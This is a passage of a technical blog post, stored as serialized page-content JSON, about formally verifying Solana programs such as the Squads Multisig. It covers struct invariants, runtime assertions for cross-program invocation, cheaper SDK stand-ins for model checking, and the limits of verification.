",{"type":24,"tag":5422,"props":34571,"children":34572},{},[34573],{"type":30,"value":34574},"validity",{"type":30,"value":34576}," with a struct invariant. In fact the invariant we defined earlier will be sufficient:",{"type":24,"tag":291,"props":34578,"children":34580},{"code":34579,"language":9817,"meta":7,"className":9818,"style":7},"#[invariant(\n (self.threshold >= 1)\n && (self.threshold as usize \u003C= self.keys.len())\n)]\npub struct Ms { ... }\n",[34581],{"type":24,"tag":145,"props":34582,"children":34583},{"__ignoreMap":7},[34584,34591,34614,34665,34672],{"type":24,"tag":301,"props":34585,"children":34586},{"class":303,"line":304},[34587],{"type":24,"tag":301,"props":34588,"children":34589},{"style":359},[34590],{"type":30,"value":27547},{"type":24,"tag":301,"props":34592,"children":34593},{"class":303,"line":320},[34594,34598,34602,34606,34610],{"type":24,"tag":301,"props":34595,"children":34596},{"style":359},[34597],{"type":30,"value":31485},{"type":24,"tag":301,"props":34599,"children":34600},{"style":385},[34601],{"type":30,"value":206},{"type":24,"tag":301,"props":34603,"children":34604},{"style":359},[34605],{"type":30,"value":27840},{"type":24,"tag":301,"props":34607,"children":34608},{"style":385},[34609],{"type":30,"value":16748},{"type":24,"tag":301,"props":34611,"children":34612},{"style":359},[34613],{"type":30,"value":27849},{"type":24,"tag":301,"props":34615,"children":34616},{"class":303,"line":335},[34617,34621,34625,34629,34633,34637,34641,34645,34649,34653,34657,34661],{"type":24,"tag":301,"props":34618,"children":34619},{"style":385},[34620],{"type":30,"value":22410},{"type":24,"tag":301,"props":34622,"children":34623},{"style":359},[34624],{"type":30,"value":27773},{"type":24,"tag":301,"props":34626,"children":34627},{"style":385},[34628],{"type":30,"value":206},{"type":24,"tag":301,"props":34630,"children":34631},{"style":359},[34632],{"type":30,"value":27840},{"type":24,"tag":301,"props":34634,"children":34635},{"style":348},[34636],{"type":30,"value":15654},{"type":24,"tag":301,"props":34638,"children":34639},{"style":10246},[34640],{"type":30,"value":20525},{"type":24,"tag":301,"props":34642,"children":34643},{"style":385},[34644],{"type":30,"value":15012},{"type":24,"tag":301,"props":34646,"children":34647},{"style":359},[34648],{"type":30,"value":20590},{"type":24,"tag":301,"props":34650,"children":34651},{"style":385},[34652],{"type":30,"value":206},{"type":24,"tag":301,"props":34654,"children":34655},{"style":359},[34656],{"type":30,"value":27752},{"type":24,"tag":301,"props":34658,"children":34659},{"style":385},[34660],{"type":30,"value":206},{"type":24,"tag":301,"props":34662,"children":34663},{"style":359},[34664],{"type":30,"value":27901},{"type":24,"tag":301,"props":34666,"children":34667},{"class":303,"line":344},[34668],{"type":24,"tag":301,"props":34669,"children":34670},{"style":359},[34671],{"type":30,"value":27029},{"type":24,"tag":301,"props":34673,"children":34674},{"class":303,"line":401},[34675,34679,34683,34687,34691,34695],{"type":24,"tag":301,"props":34676,"children":34677},{"style":348},[34678],{"type":30,"value":20484},{"type":24,"tag":301,"props":34680,"children":34681},{"style":348},[34682],{"type":30,"value":27920},{"type":24,"tag":301,"props":34684,"children":34685},{"style":10246},[34686],{"type":30,"value":27925},{"type":24,"tag":301,"props":34688,"children":34689},{"style":359},[34690],{"type":30,"value":16392},{"type":24,"tag":301,"props":34692,"children":34693},{"style":385},[34694],{"type":30,"value":4054},{"type":24,"tag":301,"props":34696,"children":34697},{"style":359},[34698],{"type":30,"value":16401},{"type":24,"tag":32,"props":34700,"children":34701},{},[34702,34704,34710,34712,34718],{"type":30,"value":34703},"The use of a struct invariant allows us to define (and verify) the possible states that an account can be in at the start and end of an instruction. In this case, our struct invariant rules out the case where ",{"type":24,"tag":145,"props":34705,"children":34707},{"className":34706},[],[34708],{"type":30,"value":34709},"keys.len() == 0",{"type":30,"value":34711}," and allows us to prove the biconditional ",{"type":24,"tag":145,"props":34713,"children":34715},{"className":34714},[],[34716],{"type":30,"value":34717},"(keys.len() >= 1) -> (instruction succeeds)",{"type":30,"value":206},{"type":24,"tag":80,"props":34720,"children":34722},{"id":34721},"safety-guarantees",[34723],{"type":30,"value":29552},{"type":24,"tag":32,"props":34725,"children":34726},{},[34727],{"type":30,"value":34728},"Formal verification is an awesome technique but it is not perfect. There are situations where things are not possible to formally verify and you need to resort to other methods.",{"type":24,"tag":32,"props":34730,"children":34731},{},[34732],{"type":30,"value":34733},"In particular, one of the difficult-to-verify parts of the Squads Multisig program is cross-program-invocation. Specifically, since cross-program-invocation executes foreign code, it is difficult (if not impossible) to verify whether this will succeed or fail.",{"type":24,"tag":32,"props":34735,"children":34736},{},[34737,34739,34745],{"type":30,"value":34738},"In the multisig program this happens in the ",{"type":24,"tag":145,"props":34740,"children":34742},{"className":34741},[],[34743],{"type":30,"value":34744},"execute_transaction",{"type":30,"value":34746}," instruction.",{"type":24,"tag":32,"props":34748,"children":34749},{},[34750],{"type":24,"tag":5422,"props":34751,"children":34752},{},[34753],{"type":30,"value":34754},"So what do you do?",{"type":24,"tag":32,"props":34756,"children":34757},{},[34758],{"type":30,"value":34759},"For example, in a worst-case scenario you could imagine a situation like the following:",{"type":24,"tag":291,"props":34761,"children":34763},{"code":34762,"language":9817,"meta":7,"className":9818,"style":7},"#[derive(Accounts)]\npub MyCtx {\n #[account(mut)]\n pub my_account: Account\u003C'info, Acc>\n}\n\n#[account]\n#[invariant(bad == false)]\nstruct Acc {\n pub bad: bool\n}\n\nimpl Acc {\n pub fn put_into_bad_state() {\n self.bad = true;\n }\n}\n\n// Instruction handler:\nfn hard_to_verify(ctx: Context\u003CMyCtx>) -> Result\u003C()> {\n invoke_signed(...); // Cross-program invocation\n\n let invoke_res = ...; // fetch result of invocation\n if invoke_res == 5 {\n ctx.my_account.put_into_bad_state(); // corrupt our account\n }\n Ok(())\n}\n",[34764],{"type":24,"tag":145,"props":34765,"children":34766},{"__ignoreMap":7},[34767,34782,34798,34813,34854,34861,34868,34875,34892,34908,34929,34936,34943,34959,34979,35007,35014,35021,35028,35036,35089,35115,35122,35151,35175,35210,35217,35228],{"type":24,"tag":301,"props":34768,"children":34769},{"class":303,"line":304},[34770,34774,34778],{"type":24,"tag":301,"props":34771,"children":34772},{"style":359},[34773],{"type":30,"value":29605},{"type":24,"tag":301,"props":34775,"children":34776},{"style":10246},[34777],{"type":30,"value":29610},{"type":24,"tag":301,"props":34779,"children":34780},{"style":359},[34781],{"type":30,"value":27029},{"type":24,"tag":301,"props":34783,"children":34784},{"class":303,"line":320},[34785,34789,34794],{"type":24,"tag":301,"props":34786,"children":34787},{"style":348},[34788],{"type":30,"value":20484},{"type":24,"tag":301,"props":34790,"children":34791},{"style":10246},[34792],{"type":30,"value":34793}," MyCtx",{"type":24,"tag":301,"props":34795,"children":34796},{"style":359},[34797],{"type":30,"value":3035},{"type":24,"tag":301,"props":34799,"children":34800},{"class":303,"line":335},[34801,34805,34809],{"type":24,"tag":301,"props":34802,"children":34803},{"style":359},[34804],{"type":30,"value":29896},{"type":24,"tag":301,"props":34806,"children":34807},{"style":348},[34808],{"type":30,"value":10550},{"type":24,"tag":301,"props":34810,"children":34811},{"style":359},[34812],{"type":30,"value":27029},{"type":24,"tag":301,"props":34814,"children":34815},{"class":303,"line":344},[34816,34820,34825,34829,34833,34837,34841,34845,34850],{"type":24,"tag":301,"props":34817,"children":34818},{"style":348},[34819],{"type":30,"value":27612},{"type":24,"tag":301,"props":34821,"children":34822},{"style":369},[34823],{"type":30,"value":34824}," my_account",{"type":24,"tag":301,"props":34826,"children":34827},{"style":385},[34828],{"type":30,"value":1679},{"type":24,"tag":301,"props":34830,"children":34831},{"style":10246},[34832],{"type":30,"value":29861},{"type":24,"tag":301,"props":34834,"children":34835},{"style":359},[34836],{"type":30,"value":29690},{"type":24,"tag":301,"props":34838,"children":34839},{"style":10246},[34840],{"type":30,"value":29695},{"type":24,"tag":301,"props":34842,"children":34843},{"style":359},[34844],{"type":30,"value":377},{"type":24,"tag":301,"props":34846,"children":34847},{"style":10246},[34848],{"type":30,"value":34849},"Acc",{"type":24,"tag":301,"props":34851,"children":34852},{"style":359},[34853],{"type":30,"value":12812},{"type":24,"tag":301,"props":34855,"children":34856},{"class":303,"line":401},[34857],{"type":24,"tag":301,"props":34858,"children":34859},{"style":359},[34860],{"type":30,"value":698},{"type":24,"tag":301,"props":34862,"children":34863},{"class":303,"line":415},[34864],{"type":24,"tag":301,"props":34865,"children":34866},{"emptyLinePlaceholder":16},[34867],{"type":30,"value":341},{"type":24,"tag":301,"props":34869,"children":34870},{"class":303,"line":439},[34871],{"type":24,"tag":301,"props":34872,"children":34873},{"style":359},[34874],{"type":30,"value":27539},{"type":24,"tag":301,"props":34876,"children":34877},{"class":303,"line":447},[34878,34883,34887],{"type":24,"tag":301,"props":34879,"children":34880},{"style":359},[34881],{"type":30,"value":34882},"#[invariant(bad ",{"type":24,"tag":301,"props":34884,"children":34885},{"style":385},[34886],{"type":30,"value":607},{"type":24,"tag":301,"props":34888,"children":34889},{"style":359},[34890],{"type":30,"value":34891}," false)]\n",{"type":24,"tag":301,"props":34893,"children":34894},{"class":303,"line":476},[34895,34899,34904],{"type":24,"tag":301,"props":34896,"children":34897},{"style":348},[34898],{"type":30,"value":3010},{"type":24,"tag":301,"props":34900,"children":34901},{"style":10246},[34902],{"type":30,"value":34903}," Acc",{"type":24,"tag":301,"props":34905,"children":34906},{"style":359},[34907],{"type":30,"value":3035},{"type":24,"tag":301,"props":34909,"children":34910},{"class":303,"line":495},[34911,34915,34920,34924],{"type":24,"tag":301,"props":34912,"children":34913},{"style":348},[34914],{"type":30,"value":27612},{"type":24,"tag":301,"props":34916,"children":34917},{"style":369},[34918],{"type":30,"value":34919}," bad",{"type":24,"tag":301,"props":34921,"children":34922},{"style":385},[34923],{"type":30,"value":1679},{"type":24,"tag":301,"props":34925,"children":34926},{"style":10246},[34927],{"type":30,"value":34928}," bool\n",{"type":24,"tag":301,"props":34930,"children":34931},{"class":303,"line":504},[34932],{"type":24,"tag":301,"props":34933,"children":34934},{"style":359},[34935],{"type":30,"value":698},{"type":24,"tag":301,"props":34937,"children":34938},{"class":303,"line":512},[34939],{"type":24,"tag":301,"props":34940,"children":34941},{"emptyLinePlaceholder":16},[34942],{"type":30,"value":341},{"type":24,"tag":301,"props":34944,"children":34945},{"class":303,"line":592},[34946,34951,34955],{"type":24,"tag":301,"props":34947,"children":34948},{"style":348},[34949],{"type":30,"value":34950},"impl",{"type":24,"tag":301,"props":34952,"children":34953},{"style":10246},[34954],{"type":30,"value":34903},{"type":24,"tag":301,"props":34956,"children":34957},{"style":359},[34958],{"type":30,"value":3035},{"type":24,"tag":301,"props":34960,"children":34961},{"class":303,"line":619},[34962,34966,34970,34975],{"type":24,"tag":301,"props":34963,"children":34964},{"style":348},[34965],{"type":30,"value":27612},{"type":24,"tag":301,"props":34967,"children":34968},{"style":348},[34969],{"type":30,"value":20489},{"type":24,"tag":301,"props":34971,"children":34972},{"style":314},[34973],{"type":30,"value":34974}," put_into_bad_state",{"type":24,"tag":301,"props":34976,"children":34977},{"style":359},[34978],{"type":30,"value":3883},{"type":24,"tag":301,"props":34980,"children":34981},{"class":303,"line":635},[34982,34986,34990,34995,34999,35003],{"type":24,"tag":301,"props":34983,"children":34984},{"style":348},[34985],{"type":30,"value":34115},{"type":24,"tag":301,"props":34987,"children":34988},{"style":385},[34989],{"type":30,"value":206},{"type":24,"tag":301,"props":34991,"children":34992},{"style":359},[34993],{"type":30,"value":34994},"bad ",{"type":24,"tag":301,"props":34996,"children":34997},{"style":385},[34998],{"type":30,"value":523},{"type":24,"tag":301,"props":35000,"children":35001},{"style":348},[35002],{"type":30,"value":3440},{"type":24,"tag":301,"props":35004,"children":35005},{"style":359},[35006],{"type":30,"value":492},{"type":24,"tag":301,"props":35008,"children":35009},{"class":303,"line":643},[35010],{"type":24,"tag":301,"props":35011,"children":35012},{"style":359},[35013],{"type":30,"value":501},{"type":24,"tag":301,"props":35015,"children":35016},{"class":303,"line":652},[35017],{"type":24,"tag":301,"props":35018,"children":35019},{"style":359},[35020],{"type":30,"value":698},{"type":24,"tag":301,"props":35022,"children":35023},{"class":303,"line":666},[35024],{"type":24,"tag":301,"props":35025,"children":35026},{"emptyLinePlaceholder":16},[35027],{"type":30,"value":341},{"type":24,"tag":301,"props":35029,"children":35030},{"class":303,"line":674},[35031],{"type":24,"tag":301,"props":35032,"children":35033},{"style":1062},[35034],{"type":30,"value":35035},"// Instruction handler:\n",{"type":24,"tag":301,"props":35037,"children":35038},{"class":303,"line":692},[35039,35043,35048,35052,35056,35060,35064,35068,35073,35077,35081,35085],{"type":24,"tag":301,"props":35040,"children":35041},{"style":348},[35042],{"type":30,"value":27037},{"type":24,"tag":301,"props":35044,"children":35045},{"style":314},[35046],{"type":30,"value":35047}," hard_to_verify",{"type":24,"tag":301,"props":35049,"children":35050},{"style":359},[35051],{"type":30,"value":362},{"type":24,"tag":301,"props":35053,"children":35054},{"style":369},[35055],{"type":30,"value":27051},{"type":24,"tag":301,"props":35057,"children":35058},{"style":385},[35059],{"type":30,"value":1679},{"type":24,"tag":301,"props":35061,"children":35062},{"style":10246},[35063],{"type":30,"value":27060},{"type":24,"tag":301,"props":35065,"children":35066},{"style":359},[35067],{"type":30,"value":1849},{"type":24,"tag":301,"props":35069,"children":35070},{"style":10246},[35071],{"type":30,"value":35072},"MyCtx",{"type":24,"tag":301,"props":35074,"children":35075},{"style":359},[35076],{"type":30,"value":27217},{"type":24,"tag":301,"props":35078,"children":35079},{"style":385},[35080],{"type":30,"value":882},{"type":24,"tag":301,"props":35082,"children":35083},{"style":10246},[35084],{"type":30,"value":20555},{"type":24,"tag":301,"props":35086,"children":35087},{"style":359},[35088],{"type":30,"value":27102},{"type":24,"tag":301,"props":35090,"children":35091},{"class":303,"line":3631},[35092,35097,35101,35105,35110],{"type":24,"tag":301,"props":35093,"children":35094},{"style":314},[35095],{"type":30,"value":35096}," invoke_signed",{"type":24,"tag":301,"props":35098,"children":35099},{"style":359},[35100],{"type":30,"value":362},{"type":24,"tag":301,"props":35102,"children":35103},{"style":385},[35104],{"type":30,"value":4054},{"type":24,"tag":301,"props":35106,"children":35107},{"style":359},[35108],{"type":30,"value":35109},"); ",{"type":24,"tag":301,"props":35111,"children":35112},{"style":1062},[35113],{"type":30,"value":35114},"// Cross-program invocation\n",{"type":24,"tag":301,"props":35116,"children":35117},{"class":303,"line":3639},[35118],{"type":24,"tag":301,"props":35119,"children":35120},{"emptyLinePlaceholder":16},[35121],{"type":30,"value":341},{"type":24,"tag":301,"props":35123,"children":35124},{"class":303,"line":3647},[35125,35129,35134,35138,35142,35146],{"type":24,"tag":301,"props":35126,"children":35127},{"style":348},[35128],{"type":30,"value":9838},{"type":24,"tag":301,"props":35130,"children":35131},{"style":369},[35132],{"type":30,"value":35133}," invoke_res",{"type":24,"tag":301,"props":35135,"children":35136},{"style":385},[35137],{"type":30,"value":2537},{"type":24,"tag":301,"props":35139,"children":35140},{"style":385},[35141],{"type":30,"value":32055},{"type":24,"tag":301,"props":35143,"children":35144},{"style":359},[35145],{"type":30,"value":3940},{"type":24,"tag":301,"props":35147,"children":35148},{"style":1062},[35149],{"type":30,"value":35150},"// fetch result of invocation\n",{"type":24,"tag":301,"props":35152,"children":35153},{"class":303,"line":3685},[35154,35158,35162,35166,35171],{"type":24,"tag":301,"props":35155,"children":35156},{"style":308},[35157],{"type":30,"value":453},{"type":24,"tag":301,"props":35159,"children":35160},{"style":369},[35161],{"type":30,"value":35133},{"type":24,"tag":301,"props":35163,"children":35164},{"style":385},[35165],{"type":30,"value":2460},{"type":24,"tag":301,"props":35167,"children":35168},{"style":466},[35169],{"type":30,"value":35170}," 5",{"type":24,"tag":301,"props":35172,"children":35173},{"style":359},[35174],{"type":30,"value":3035},{"type":24,"tag":301,"props":35176,"children":35177},{"class":303,"line":3713},[35178,35182,35186,35191,35195,35200,35205],{"type":24,"tag":301,"props":35179,"children":35180},{"style":369},[35181],{"type":30,"value":32942},{"type":24,"tag":301,"props":35183,"children":35184},{"style":385},[35185],{"type":30,"value":206},{"type":24,"tag":301,"props":35187,"children":35188},{"style":359},[35189],{"type":30,"value":35190},"my_account",{"type":24,"tag":301,"props":35192,"children":35193},{"style":385},[35194],{"type":30,"value":206},{"type":24,"tag":301,"props":35196,"children":35197},{"style":314},[35198],{"type":30,"value":35199},"put_into_bad_state",{"type":24,"tag":301,"props":35201,"children":35202},{"style":359},[35203],{"type":30,"value":35204},"(); ",{"type":24,"tag":301,"props":35206,"children":35207},{"style":1062},[35208],{"type":30,"value":35209},"// corrupt our account\n",{"type":24,"tag":301,"props":35211,"children":35212},{"class":303,"line":3721},[35213],{"type":24,"tag":301,"props":35214,"children":35215},{"style":359},[35216],{"type":30,"value":501},{"type":24,"tag":301,"props":35218,"children":35219},{"class":303,"line":3751},[35220,35224],{"type":24,"tag":301,"props":35221,"children":35222},{"style":10246},[35223],{"type":30,"value":21125},{"type":24,"tag":301,"props":35225,"children":35226},{"style":359},[35227],{"type":30,"value":21130},{"type":24,"tag":301,"props":35229,"children":35230},{"class":303,"line":3782},[35231],{"type":24,"tag":301,"props":35232,"children":35233},{"style":359},[35234],{"type":30,"value":698},{"type":24,"tag":32,"props":35236,"children":35237},{},[35238,35240,35245],{"type":30,"value":35239},"The integrity of the verification framework relies on the fact that the account invariants for the accounts contained in the instruction (in this case ",{"type":24,"tag":145,"props":35241,"children":35243},{"className":35242},[],[35244],{"type":30,"value":35190},{"type":30,"value":35246},") will be maintained as long as the instruction succeeds.",{"type":24,"tag":32,"props":35248,"children":35249},{},[35250],{"type":30,"value":35251},"In this case, we can't really verify if the instruction succeeds or not (at least without knowing which program/instruction will be invoked).",{"type":24,"tag":32,"props":35253,"children":35254},{},[35255,35257,35262],{"type":30,"value":35256},"However, we can ",{"type":24,"tag":5422,"props":35258,"children":35259},{},[35260],{"type":30,"value":35261},"augment",{"type":30,"value":35263}," our code with additional runtime constraints to ensure that the safety properties are preserved even if formal verification fails.",{"type":24,"tag":32,"props":35265,"children":35266},{},[35267],{"type":30,"value":35268},"In this case, we can add runtime assertions that ensure our runtime invariants hold. For example:",{"type":24,"tag":291,"props":35270,"children":35272},{"code":35271,"language":9817,"meta":7,"className":9818,"style":7},"...\nfn hard_to_verify(ctx: Context\u003CMyCtx>) -> Result\u003C()> {\n invoke_signed(...); // Cross-program invocation\n\n let invoke_res = ...; // fetch result of invocation\n if invoke_res == 5 {\n ctx.my_account.put_into_bad_state(); // corrupt our account\n }\n\n // Enforce invariants at runtime\n assert(ctx.my_account.invariant());\n\n Ok(())\n}\n",[35273],{"type":24,"tag":145,"props":35274,"children":35275},{"__ignoreMap":7},[35276,35284,35335,35358,35365,35392,35415,35446,35453,35460,35468,35503,35510,35521],{"type":24,"tag":301,"props":35277,"children":35278},{"class":303,"line":304},[35279],{"type":24,"tag":301,"props":35280,"children":35281},{"style":385},[35282],{"type":30,"value":35283},"...\n",{"type":24,"tag":301,"props":35285,"children":35286},{"class":303,"line":320},[35287,35291,35295,35299,35303,35307,35311,35315,35319,35323,35327,35331],{"type":24,"tag":301,"props":35288,"children":35289},{"style":348},[35290],{"type":30,"value":27037},{"type":24,"tag":301,"props":35292,"children":35293},{"style":314},[35294],{"type":30,"value":35047},{"type":24,"tag":301,"props":35296,"children":35297},{"style":359},[35298],{"type":30,"value":362},{"type":24,"tag":301,"props":35300,"children":35301},{"style":369},[35302],{"type":30,"value":27051},{"type":24,"tag":301,"props":35304,"children":35305},{"style":385},[35306],{"type":30,"value":1679},{"type":24,"tag":301,"props":35308,"children":35309},{"style":10246},[35310],{"type":30,"value":27060},{"type":24,"tag":301,"props":35312,"children":35313},{"style":359},[35314],{"type":30,"value":1849},{"type":24,"tag":301,"props":35316,"children":35317},{"style":10246},[35318],{"type":30,"value":35072},{"type":24,"tag":301,"props":35320,"children":35321},{"style":359},[35322],{"type":30,"value":27217},{"type":24,"tag":301,"props":35324,"children":35325},{"style":385},[35326],{"type":30,"value":882},{"type":24,"tag":301,"props":35328,"children":35329},{"style":10246},[35330],{"type":30,"value":20555},{"type":24,"tag":301,"props":35332,"children":35333},{"style":359},[35334],{"type":30,"value":27102},{"type":24,"tag":301,"props":35336,"children":35337},{"class":303,"line":335},[35338,35342,35346,35350,35354],{"type":24,"tag":301,"props":35339,"children":35340},{"style":314},[35341],{"type":30,"value":35096},{"type":24,"tag":301,"props":35343,"children":35344},{"style":359},[35345],{"type":30,"value":362},{"type":24,"tag":301,"props":35347,"children":35348},{"style":385},[35349],{"type":30,"value":4054},{"type":24,"tag":301,"props":35351,"children":35352},{"style":359},[35353],{"type":30,"value":35109},{"type":24,"tag":301,"props":35355,"children":35356},{"style":1062},[35357],{"type":30,"value":35114},{"type":24,"tag":301,"props":35359,"children":35360},{"class":303,"line":344},[35361],{"type":24,"tag":301,"props":35362,"children":35363},{"emptyLinePlaceholder":16},[35364],{"type":30,"value":341},{"type":24,"tag":301,"props":35366,"children":35367},{"class":303,"line":401},[35368,35372,35376,35380,35384,35388],{"type":24,"tag":301,"props":35369,"children":35370},{"style":348},[35371],{"type":30,"value":9838},{"type":24,"tag":301,"props":35373,"children":35374},{"style":369},[35375],{"type":30,"value":35133},{"type":24,"tag":301,"props":35377,"children":35378},{"style":385},[35379],{"type":30,"value":2537},{"type":24,"tag":301,"props":35381,"children":35382},{"style":385},[35383],{"type":30,"value":32055},{"type":24,"tag":301,"props":35385,"children":35386},{"style":359},[35387],{"type":30,"value":3940},{"type":24,"tag":301,"props":35389,"children":35390},{"style":1062},[35391],{"type":30,"value":35150},{"type":24,"tag":301,"props":35393,"children":35394},{"class":303,"line":415},[35395,35399,35403,35407,35411],{"type":24,"tag":301,"props":35396,"children":35397},{"style":308},[35398],{"type":30,"value":453},{"type":24,"tag":301,"props":35400,"children":35401},{"style":369},[35402],{"type":30,"value":35133},{"type":24,"tag":301,"props":35404,"children":35405},{"style":385},[35406],{"type":30,"value":2460},{"type":24,"tag":301,"props":35408,"children":35409},{"style":466},[35410],{"type":30,"value":35170},{"type":24,"tag":301,"props":35412,"children":35413},{"style":359},[35414],{"type":30,"value":3035},{"type":24,"tag":301,"props":35416,"children":35417},{"class":303,"line":439},[35418,35422,35426,35430,35434,35438,35442],{"type":24,"tag":301,"props":35419,"children":35420},{"style":369},[35421],{"type":30,"value":32942},{"type":24,"tag":301,"props":35423,"children":35424},{"style":385},[35425],{"type":30,"value":206},{"type":24,"tag":301,"props":35427,"children":35428},{"style":359},[35429],{"type":30,"value":35190},{"type":24,"tag":301,"props":35431,"children":35432},{"style":385},[35433],{"type":30,"value":206},{"type":24,"tag":301,"props":35435,"children":35436},{"style":314},[35437],{"type":30,"value":35199},{"type":24,"tag":301,"props":35439,"children":35440},{"style":359},[35441],{"type":30,"value":35204},{"type":24,"tag":301,"props":35443,"children":35444},{"style":1062},[35445],{"type":30,"value":35209},{"type":24,"tag":301,"props":35447,"children":35448},{"class":303,"line":447},[35449],{"type":24,"tag":301,"props":35450,"children":35451},{"style":359},[35452],{"type":30,"value":501},{"type":24,"tag":301,"props":35454,"children":35455},{"class":303,"line":476},[35456],{"type":24,"tag":301,"props":35457,"children":35458},{"emptyLinePlaceholder":16},[35459],{"type":30,"value":341},{"type":24,"tag":301,"props":35461,"children":35462},{"class":303,"line":495},[35463],{"type":24,"tag":301,"props":35464,"children":35465},{"style":1062},[35466],{"type":30,"value":35467}," // Enforce invariants at runtime\n",{"type":24,"tag":301,"props":35469,"children":35470},{"class":303,"line":504},[35471,35475,35479,35483,35487,35491,35495,35499],{"type":24,"tag":301,"props":35472,"children":35473},{"style":314},[35474],{"type":30,"value":26014},{"type":24,"tag":301,"props":35476,"children":35477},{"style":359},[35478],{"type":30,"value":362},{"type":24,"tag":301,"props":35480,"children":35481},{"style":369},[35482],{"type":30,"value":27051},{"type":24,"tag":301,"props":35484,"children":35485},{"style":385},[35486],{"type":30,"value":206},{"type":24,"tag":301,"props":35488,"children":35489},{"style":359},[35490],{"type":30,"value":35190},{"type":24,"tag":301,"props":35492,"children":35493},{"style":385},[35494],{"type":30,"value":206},{"type":24,"tag":301,"props":35496,"children":35497},{"style":314},[35498],{"type":30,"value":28547},{"type":24,"tag":301,"props":35500,"children":35501},{"style":359},[35502],{"type":30,"value":22214},{"type":24,"tag":301,"props":35504,"children":35505},{"class":303,"line":512},[35506],{"type":24,"tag":301,"props":35507,"children":35508},{"emptyLinePlaceholder":16},[35509],{"type":30,"value":341},{"type":24,"tag":301,"props":35511,"children":35512},{"class":303,"line":592},[35513,35517],{"type":24,"tag":301,"props":35514,"children":35515},{"style":10246},[35516],{"type":30,"value":21125},{"type":24,"tag":301,"props":35518,"children":35519},{"style":359},[35520],{"type":30,"value":21130},{"type":24,"tag":301,"props":35522,"children":35523},{"class":303,"line":619},[35524],{"type":24,"tag":301,"props":35525,"children":35526},{"style":359},[35527],{"type":30,"value":698},{"type":24,"tag":32,"props":35529,"children":35530},{},[35531,35533,35538,35540,35545,35547,35552],{"type":30,"value":35532},"Here, we explicitly ",{"type":24,"tag":145,"props":35534,"children":35536},{"className":35535},[],[35537],{"type":30,"value":26755},{"type":30,"value":35539}," that our invariants hold at ",{"type":24,"tag":5422,"props":35541,"children":35542},{},[35543],{"type":30,"value":35544},"runtime",{"type":30,"value":35546}," which allows us to be assured that ",{"type":24,"tag":145,"props":35548,"children":35550},{"className":35549},[],[35551],{"type":30,"value":35190},{"type":30,"value":35553}," will not enter a bad state as a result of some unverifiable behavior.",{"type":24,"tag":32,"props":35555,"children":35556},{},[35557],{"type":30,"value":35558},"In general techniques like this can be used to tidy up the loose ends that formal verification may struggle with.",{"type":24,"tag":43,"props":35560,"children":35562},{"id":35561},"challenges-of-formal-verification-on-solana",[35563],{"type":30,"value":35564},"Challenges of formal verification on Solana",{"type":24,"tag":80,"props":35566,"children":35568},{"id":35567},"expensive-computation",[35569],{"type":30,"value":35570},"Expensive computation",{"type":24,"tag":32,"props":35572,"children":35573},{},[35574,35576,35581],{"type":30,"value":35575},"As we started exploring this project, we were hoping to see it work straight out of the box. Unfortunately, that was not the case. Harkening back to our friend ",{"type":24,"tag":5422,"props":35577,"children":35578},{},[35579],{"type":30,"value":35580},"path explosion",{"type":30,"value":35582},", it is often the case that bounded model checking just grinds and grinds on the problem and is not able to produce a solution.",{"type":24,"tag":32,"props":35584,"children":35585},{},[35586,35588,35593],{"type":30,"value":35587},"In order to make this technique more widely applicable, we've been developing a runtime SDK layer that is more ",{"type":24,"tag":5422,"props":35589,"children":35590},{},[35591],{"type":30,"value":35592},"formal verification friendly",{"type":30,"value":35594},". Specifically our tool will replace certain built-in SDK functions and structures with less expensive ones in the context of symbolic execution.",{"type":24,"tag":32,"props":35596,"children":35597},{},[35598,35600,35605,35607,35612],{"type":30,"value":35599},"For example, when verifying things like the uniqueness of a ",{"type":24,"tag":145,"props":35601,"children":35603},{"className":35602},[],[35604],{"type":30,"value":28167},{"type":30,"value":35606}," in a ",{"type":24,"tag":145,"props":35608,"children":35610},{"className":35609},[],[35611],{"type":30,"value":23991},{"type":30,"value":35613},", the native program may generate extremely large SMT expressions containing nested 32-byte comparisons and binary searches on a vector.",{"type":24,"tag":32,"props":35615,"children":35616},{},[35617,35619,35624,35626,35631,35633,35638,35640,35645,35647,35652,35654,35659],{"type":30,"value":35618},"However, in most cases the properties we are interested in do not require specific search algorithms for the ",{"type":24,"tag":145,"props":35620,"children":35622},{"className":35621},[],[35623],{"type":30,"value":23991},{"type":30,"value":35625}," or a 32-byte ",{"type":24,"tag":145,"props":35627,"children":35629},{"className":35628},[],[35630],{"type":30,"value":28167},{"type":30,"value":35632},". Instead, our tool can substitute in ",{"type":24,"tag":5422,"props":35634,"children":35635},{},[35636],{"type":30,"value":35637},"cheaper",{"type":30,"value":35639}," types and functions, such as a 4-byte ",{"type":24,"tag":145,"props":35641,"children":35643},{"className":35642},[],[35644],{"type":30,"value":28167},{"type":30,"value":35646}," struct and a fixed-size, array-backed ",{"type":24,"tag":145,"props":35648,"children":35650},{"className":35649},[],[35651],{"type":30,"value":23991},{"type":30,"value":35653}," implementation. These structures are API-compatible with the native SDK and the changes are functionally invisible to the Solana program we are verifying. However, the generated expressions are ",{"type":24,"tag":5422,"props":35655,"children":35656},{},[35657],{"type":30,"value":35658},"much",{"type":30,"value":35660}," simpler and we find that these techniques can greatly accelerate the speed of model-checking.",{"type":24,"tag":32,"props":35662,"children":35663},{},[35664],{"type":30,"value":35665},"It is of key importance that these SDK modifications do not introduce any unsoundness into the model-checking process. We are actively exploring how to do this effectively.",{"type":24,"tag":80,"props":35667,"children":35669},{"id":35668},"runtime-environment",[35670],{"type":30,"value":35671},"Runtime Environment",{"type":24,"tag":32,"props":35673,"children":35674},{},[35675],{"type":30,"value":35676},"While these techniques are quite capable of verifying pure-Rust constructs such as the logical flow of the program, use of Rust types, etc... other aspects of the Solana runtime environment are more difficult to verify.",{"type":24,"tag":32,"props":35678,"children":35679},{},[35680],{"type":30,"value":35681},"For example, a program may resize accounts to store variable amounts of data. These types of custom serialization algorithms require specialized techniques to verify account invariants. For example, a bug with account serialization could undermine \"correct\" account logic.",{"type":24,"tag":32,"props":35683,"children":35684},{},[35685],{"type":30,"value":35686},"Another example is cross-program invocation (CPI). While account data cannot be changed by other programs, when you invoke other instructions it becomes more difficult to verify instruction invariants. An instruction three levels down could fail and cause the whole transaction to revert.",{"type":24,"tag":43,"props":35688,"children":35689},{"id":9652},[35690],{"type":30,"value":9655},{"type":24,"tag":32,"props":35692,"children":35693},{},[35694],{"type":30,"value":35695},"Computer security is far from being a solved problem. Formal verification is a great technique but it is not a magic bullet. While it can help you verify the correctness of your program it won't catch 100% of the bugs. It won't stop you from specifying the wrong invariants or forgetting things, and it can't help you if there is a bug outside of the scope of the model — for example in the runtime or consensus 